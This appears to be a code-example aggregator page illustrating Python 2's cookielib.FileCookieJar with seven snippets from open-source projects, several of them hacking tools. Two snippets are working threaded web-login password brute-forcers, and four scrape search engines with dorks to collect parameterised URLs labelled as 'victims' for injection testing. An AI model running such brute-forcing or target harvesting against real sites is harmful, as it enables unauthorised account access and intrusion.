Python cookielib module: FileCookieJar() code examples

We extracted the following 7 code examples from open-source Python projects to illustrate how to use cookielib.FileCookieJar().
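For context: cookielib is the Python 2 module (renamed http.cookiejar in Python 3), and FileCookieJar is the base class for cookie jars that can be persisted to a file. The base class does not implement loading or saving itself; its subclasses MozillaCookieJar and LWPCookieJar do. All of the examples below share one pattern: pair a jar with urllib2.HTTPCookieProcessor so cookies are captured and replayed automatically. A minimal sketch of that pattern (the URL and filename are placeholders):

import cookielib
import urllib2

# a jar nominally backed by a file; note that FileCookieJar itself does not
# implement persistence, so calling jar.save() raises NotImplementedError
jar = cookielib.FileCookieJar("cookies")

# route all requests through the jar so Set-Cookie headers are captured
# and replayed on subsequent requests made with the same opener
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
response = opener.open("http://example.com/")  # placeholder URL

for cookie in jar:
    print cookie.name, cookie.value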

Project: darkc0de-old-stuff    Author: tuwid    | project source | file source
def cxeSearch(go_inurl, go_site, go_cxe, go_ftype, maxc):
    # relies on module-level globals: gnum (results per page) and header
    # (a list of User-Agent strings), plus cookielib/urllib2/re/random imports
    uRLS = []
    counter = 0
    while counter < int(maxc):
        jar = cookielib.FileCookieJar("cookies")
        query = 'q='+go_inurl+'+'+go_site+'+'+go_ftype
        results_web = 'http://www.google.com/cse?'+go_cxe+'&'+query+'&num='+str(gnum)+'&hl=en&lr=&ie=UTF-8&start='+repr(counter)+'&sa=N'
        request_web = urllib2.Request(results_web)
        agent = random.choice(header)
        request_web.add_header('User-Agent', agent)
        opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
        text = opener_web.open(request_web).read()
        strreg = re.compile('(?<=href=")(.*?)(?=")')
        names = strreg.findall(text)
        counter += 100
        for name in names:
            if name not in uRLS:
                if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
                    pass
                elif re.search("google", name) or re.search("youtube", name) or re.search(".gov", name) or re.search("%", name):
                    pass
                else:
                    uRLS.append(name)
    tmpList = []; finalList = []
    print "[+] URLS (unsorted) :", len(uRLS)
    for entry in uRLS:
        try:
            t2host = entry.split("/", 3)
            domain = t2host[2]
            # keep one URL per domain, and only URLs with a query parameter
            if domain not in tmpList and "=" in entry:
                finalList.append(entry)
                tmpList.append(domain)
        except:
            pass
    print "[+] URLS (sorted)   :", len(finalList)
    return finalList
Project: PyHack    Author: lanxia    | project source | file source
def webBruter(self):
    # method of a brute-forcing thread class; relies on module-level globals
    # targetUrl, targetPost, userNameField, passwordField, successCheck, and
    # a BruteParser HTML parser class (sketched below)
    while not self.password.empty() and not self.found:
        brute = self.password.get().rstrip()
        jar = cookielib.FileCookieJar("cookies")
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

        response = opener.open(targetUrl)

        page = response.read()

        print "Trying: %s : %s (%d left)" % (self.userName, brute, self.password.qsize())

        parser = BruteParser()
        parser.feed(page)

        postTags = parser.tagResults
        postTags[userNameField] = self.userName
        postTags[passwordField] = brute

        loginData = urllib.urlencode(postTags)
        loginResponse = opener.open(targetPost, loginData)
        loginResult = loginResponse.read()

        if successCheck in loginResult:
            self.found = True

            print "[*] Bruteforce successful."
            print "[*] Username: %s" % self.userName  # was the undefined name userName
            print "[*] Password: %s" % brute
            print "[*] Waiting for other threads to exit..."
Project: django-learning    Author: adoggie    | project source | file source
def __init__(self, name=''):
    self.name = name
    self.cookie = cookielib.CookieJar()
    cookie_file = 'cookie.txt'
    # cookie = cookielib.MozillaCookieJar(cookie_file)
    # self.cookie = cookielib.FileCookieJar(cookie_file)
    self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))
    self.headers = {"User-agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"}
    # HEADERS is a module-level string of raw "Name: value" header lines
    for line in HEADERS.split('\n'):
        if not line.strip(): continue
        # split on the first ':' only, so header values may contain colons
        k, v = line.split(':', 1)
        self.headers[k] = v

    self.method = 'GET'
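The commented-out lines above hint at the usual way to actually persist cookies: use the MozillaCookieJar subclass, which implements save() and load() in the Netscape cookies.txt format. A sketch of that round trip (the path and URL are placeholders):

import cookielib
import urllib2

cookie_file = 'cookie.txt'  # placeholder path
jar = cookielib.MozillaCookieJar(cookie_file)

try:
    # load previously saved cookies, keeping session and expired ones too
    jar.load(ignore_discard=True, ignore_expires=True)
except IOError:
    pass  # no cookie file yet on the first run

opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
opener.open('http://example.com/')  # placeholder URL

# persist the jar for the next run
jar.save(ignore_discard=True, ignore_expires=True)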
Project: trojan    Author: Hackerl    | project source | file source
def web_bruter(self):
    while not self.password_q.empty() and not self.found:
        # take the next candidate password off the queue
        brute = self.password_q.get().rstrip()
        # fresh cookie jar for this attempt
        jar = cookielib.FileCookieJar("cookies")
        # opener that stores any Set-Cookie responses in jar
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

        # fetch the login page
        response = opener.open(target_url)
        page = response.read()
        print 'Trying: %s : %s (%d left)' % (self.username, brute, self.password_q.qsize())
        # parse the form fields out of the page
        parser = BruterParser()
        parser.feed(page)
        # collect the parsed input tags
        post_tags = parser.tag_results
        # fill in the username and password fields
        post_tags[username_field] = self.username
        post_tags[password_field] = brute
        # encode the POST body
        login_data = urllib.urlencode(post_tags)
        # submit the login request, replaying the session cookies
        login_response = opener.open(target_post, login_data)
        # read back the result page
        login_result = login_response.read()
        # if the failure marker is absent, the login succeeded
        if failed_check not in login_result:
            self.found = True

            print '[*] Bruteforce successful'
            print '[*] Username: %s' % self.username  # was the undefined name username
            print '[*] Password: %s' % brute
            print '[*] Waiting for other threads to exit...'
# next in the source: the BruterParser class, an HTMLParser that collects the page's input tags
Project: darkc0de-old-stuff    Author: tuwid    | project source | file source
def gHarv(dork, site, dP, cxe, output, gnum, maxcount):
    # relies on module-level globals: CXdic, rSA, iC, ParmURLS_List, statList,
    # and the Tkinter widgets txtField / TestHost_bttn
    global GoogleURLS, tmplist, gcount
    counter = 0
    gcount += 1
    GoogleURLS = []
    try:
        CXr = CXdic[cxe]
        # a list, so random.choice() returns the whole string rather than one character
        header = ['Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)']
        saveCount = len(GoogleURLS)
        cmpslptime = 0
        lastlen = 0
        while counter < int(maxcount):
            jar = cookielib.FileCookieJar("cookies")
            query = dP+dork+'+site:'+site
            gnum = int(gnum)
            results_web = 'http://www.google.com/cse?cx='+CXr+'&q='+query+'&num='+repr(gnum)+'&hl=en&lr=&ie=UTF-8&start='+repr(counter)+'&sa=N'
            request_web = urllib2.Request(results_web)
            agent = random.choice(header)
            request_web.add_header('User-Agent', agent)
            opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
            text = opener_web.open(request_web).read()
            strreg = re.compile('(?<=href=")(.*?)(?=")')
            names = strreg.findall(text)
            for name in names:
                if name not in GoogleURLS:
                    if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
                        pass
                    elif re.search("google", name) or re.search("youtube", name) or re.search(".gov", name) or re.search("blackle", name):
                        pass
                    else:
                        if output == 1:
                            txtField.insert(END, name+'\n')
                        GoogleURLS.append(name)
            # random delay between queries to avoid being throttled
            sleeptimer = random.choice(rSA)
            time.sleep(sleeptimer)
            cmpslptime += sleeptimer
            counter += int(gnum)
            percent = int((1.0*counter/int(maxcount))*100)
            laststatstring = 'Current MaxCount : '+repr(counter)+' | Last Query Sleeptimer ('+repr(sleeptimer)+') | Percent Done : '+repr(percent)
            statList.append(laststatstring)
            modStatus()
        TestHost_bttn.configure(state=NORMAL, fg=fgCol)
        if iC == True:
            for entry in GoogleURLS:
                if '=' in entry:
                    tmplist.append(entry)
        # collapse URLs that differ only in their parameter values
        for url in GoogleURLS:
            try:
                part = url.split('?')
                var = part[1].split('&')
                cod = ""
                for x in var:
                    strX = x.split("=")
                    cod += strX[0]
                    parmURL = part[0]+cod
                    if parmURL not in ParmURLS_List and url not in tmplist:
                        ParmURLS_List.append(parmURL)
                        tmplist.append(url)
            except:
                pass
        tmplist.sort()
        txtField.insert(END, '\nFound URLS: '+repr(len(GoogleURLS))+'\t\tTotal Parm-dupe Checked URLS: '+repr(len(tmplist)))
        txtField.insert(END, '\nGoogle Search Finished...\n')
    except IOError:
        pass
Project: darkc0de-old-stuff    Author: tuwid    | project source | file source
def gharv(magicWord):
    # relies on module-level globals: sitearray, CXdic, dork, dorkEXT, gnum,
    # maxcount, rSA, header, targets, uniqvictims, spidervictims, miscVic
    vUniq = []
    for site in sitearray:
        counter = 0
        bcksp = 0
        try:
            # pick a random custom search engine id
            CXname = CXdic.keys()[int(random.random()*len(CXdic.keys()))]
            CXr = CXdic[CXname]
            print "\n| Site : ", site, " | CSEngine : ", CXname+" | Progress : ",
            saveCount = len(targets)
            cmpslptime = 0
            lastlen = 0
            while counter < maxcount:
                jar = cookielib.FileCookieJar("cookies")
                query = magicWord+'+'+dork+'+site:'+site
                results_web = 'http://www.google.com/cse?cx='+CXr+'&q='+query+'&num='+str(gnum)+'&hl=en&lr=&ie=UTF-8&start='+repr(counter)+'&sa=N'
                request_web = urllib2.Request(results_web)
                agent = random.choice(header)
                request_web.add_header('User-Agent', agent)
                opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
                text = opener_web.open(request_web).read()
                strreg = re.compile('(?<=href=")(.*?)(?=")')
                names = strreg.findall(text)
                for name in names:
                    if name not in targets:
                        if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
                            pass
                        elif re.search("google", name) or re.search("youtube", name) or re.search(".gov", name):
                            pass
                        else:
                            targets.append(name)
                sleeptimer = random.choice(rSA)
                time.sleep(sleeptimer)
                cmpslptime += sleeptimer
                counter += gnum
                percent = int((1.0*counter/maxcount)*100)
                # erase the previous progress string with backspaces
                if bcksp == 1:
                    stroutlen = 0
                    while stroutlen < lastlen:
                        sys.stdout.write("\10")
                        stroutlen += 1
                sys.stdout.write("%s(%s) - %s percent" % (counter, sleeptimer, percent))
                lastlen = len(str(counter)+str(sleeptimer)+str(percent))+13
                sys.stdout.flush()
                bcksp = 1
            sys.stdout.write(" | %s Strings received, in %s seconds" % (len(targets)-saveCount, cmpslptime))
        except IOError:
            sys.stdout.write(" | %s Strings received" % (len(targets)-saveCount))
    firstparm = ''
    uList = []
    # bucket the hits: numeric first parameter -> unique victims, index pages
    # with an alphabetic first parameter -> spider victims, the rest -> misc
    for entry in targets:
        thost = entry.rsplit("=")
        t2host = entry.rsplit("/")
        try:
            firstparm = thost[1]
            domain = t2host[2]
            if domain not in uList:
                if '.'+dorkEXT+'?' in entry and firstparm.isdigit() == True:
                    uniqvictims.append(entry)
                    uList.append(domain)
                elif 'http://' in entry and 'index.' in entry and firstparm.isalpha() == True:
                    spidervictims.append(entry)
                    uList.append(domain)
                else:
                    miscVic.append(entry)
        except:
            pass
# ScanQueue Builder
Project: WebHackSHL    Author: SecHackLabs    | project source | file source
def search(inurl, maxc):
    # relies on module-level globals: sitearray, header (User-Agent list) and finallist
    urls = []
    for site in sitearray:
        page = 0
        try:
            while page < int(maxc):
                jar = cookielib.FileCookieJar("cookies")
                query = inurl+"+site:"+site
                results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(page)+'&src=hmp'
                request_web = urllib2.Request(results_web)
                agent = random.choice(header)
                request_web.add_header('User-Agent', agent)
                opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
                text = opener_web.open(request_web).read()
                stringreg = re.compile('(?<=href=")(.*?)(?=")')
                names = stringreg.findall(text)
                page += 1
                for name in names:
                    if name not in urls:
                        if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
                            pass
                        elif re.search("google", name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack", name) or re.search("phpbuilder", name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name) or re.search("facebook", name) or re.search("twitter", name):
                            pass
                        else:
                            urls.append(name)
                percent = int((1.0*page/int(maxc))*100)
                urls_len = len(urls)
                sys.stdout.write("\rSite: %s | Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site, repr(urls_len), repr(percent), repr(page)))
                sys.stdout.flush()
        except KeyboardInterrupt:
            pass
    tmplist = []
    print "\n\n[+] URLS (unfiltered): ", len(urls)
    for url in urls:
        try:
            host = url.split("/", 3)
            domain = host[2]
            # keep one URL per domain, and only URLs with a query string
            if domain not in tmplist and "=" in url:
                finallist.append(url)
                tmplist.append(domain)
        except:
            pass
    print "[+] URLS (filtered)  : ", len(finallist)
    return finallist
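One caveat that applies to every snippet above: they are Python 2 code. In Python 3 the cookielib and urllib2 modules were renamed, so a straight port of the shared pattern would look roughly like this (a sketch; the URL is a placeholder):

from http.cookiejar import CookieJar  # cookielib's Python 3 name
from urllib.request import build_opener, HTTPCookieProcessor, Request

jar = CookieJar()
opener = build_opener(HTTPCookieProcessor(jar))
request = Request("http://example.com/", headers={"User-Agent": "Mozilla/5.0"})
text = opener.open(request).read()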